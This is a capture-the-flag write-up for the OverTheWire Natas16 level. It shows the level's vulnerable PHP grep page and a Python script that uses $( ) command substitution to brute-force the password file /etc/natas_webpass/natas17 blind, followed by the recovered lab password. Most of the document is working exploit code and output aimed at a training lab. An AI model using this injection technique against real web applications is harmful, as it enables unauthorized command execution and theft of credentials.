Natas16 - natas17

From JaxHax
Jump to navigation Jump to search

Level Goal

For security reasons, we now filter even more on certain characters

Find words containing:[___________________][Search]


Output:
                                     <View sourcecode>


Solution

Decided to click the <View sourcecode> link which goes to http://natas16.natas.labs.overthewire.org/index-source.html

It gave me the following code:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas16", "pass": "<censored>" };</script></head>
<body>
<h1>natas16</h1>
<div id="content">

For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>


So same as natas9, but with more filtering. They forgot "$()", so we can still execute commands. However with double quotes filtered, we have to operate in the grep command. Basically we can do a blind results kinda like a blind SQL injection. Basically, we will execute a grep command next to a word we know is in the dictionary, if the grep returns nothing, the it will find that word in the dictionary. If it is found, that line will be there with the real word and no results should come back. Using this in junction with a "^" symbol we can brute force the value in the password file. since this is 32 characters long it would be a hassle to do this by hand. Here is some python code to do what we need.


import httplib
import urllib
import base64
import datetime

CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
CREDS = "natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
HOST = "natas16.natas.labs.overthewire.org"

conn = httplib.HTTPConnection(HOST)
headers = {"Authorization": "Basic %s" % (base64.b64encode(CREDS))}

startTime = datetime.datetime.now().strftime("%m/%d/%Y %I:%M %p")


print("\n\t\033[33;1m---===[ Natas 16 Grep Bruteforcer ]===---\033[0m\n")
print(" [*] Brute force Started!")

i = 0
passwd = ""
while i != 32:
	for c in CHARSET:
		passwd += c
		needle = urllib.quote_plus("$(grep ^" + passwd + ".* /etc/natas_webpass/natas17)Africans")
		conn.request("GET", "/?needle=" + needle + "&submit=Search", "", headers)
		res = conn.getresponse()
		if res.status == 200:
			data = res.read()
			if data.find("Africans") < 0:
				print(" [*] %02d => Current Password: %s" % (i+1,passwd))
				i += 1
				break
			else:
				passwd = passwd[:-1]
		else:
			print(" \033[31;1m[*] Got HTTP status:\033[0m %d" % (res.status))
		conn.close()
print(" [*] Think we got it : %s" % (passwd))
endTime = datetime.datetime.now().strftime("%m/%d/%Y %I:%M %p")
print(" [*] Start Time: %s" % (startTime))
print(" [*] End Time: %s" % (endTime))


And If we run that code we get the following output:


$ python natas16.py 

	---===[ Natas 16 Grep Bruteforcer ]===---

 [*] Brute force Started!
 [*] 01 => Current Password: 8
 [*] 02 => Current Password: 8P
 [*] 03 => Current Password: 8Ps
 [*] 04 => Current Password: 8Ps3
 [*] 05 => Current Password: 8Ps3H
 [*] 06 => Current Password: 8Ps3H0
 [*] 07 => Current Password: 8Ps3H0G
 [*] 08 => Current Password: 8Ps3H0GW
 [*] 09 => Current Password: 8Ps3H0GWb
 [*] 10 => Current Password: 8Ps3H0GWbn
 [*] 11 => Current Password: 8Ps3H0GWbn5
 [*] 12 => Current Password: 8Ps3H0GWbn5r
 [*] 13 => Current Password: 8Ps3H0GWbn5rd
 [*] 14 => Current Password: 8Ps3H0GWbn5rd9
 [*] 15 => Current Password: 8Ps3H0GWbn5rd9S
 [*] 16 => Current Password: 8Ps3H0GWbn5rd9S7
 [*] 17 => Current Password: 8Ps3H0GWbn5rd9S7G
 [*] 18 => Current Password: 8Ps3H0GWbn5rd9S7Gm
 [*] 19 => Current Password: 8Ps3H0GWbn5rd9S7GmA
 [*] 20 => Current Password: 8Ps3H0GWbn5rd9S7GmAd
 [*] 21 => Current Password: 8Ps3H0GWbn5rd9S7GmAdg
 [*] 22 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQ
 [*] 23 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQN
 [*] 24 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNd
 [*] 25 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdk
 [*] 26 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkh
 [*] 27 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhP
 [*] 28 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPk
 [*] 29 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq
 [*] 30 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9
 [*] 31 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c
 [*] 32 => Current Password: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
 [*] Think we got it : 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
 [*] Start Time: 07/26/2016 06:40 AM
 [*] End Time: 07/26/2016 06:45 AM

$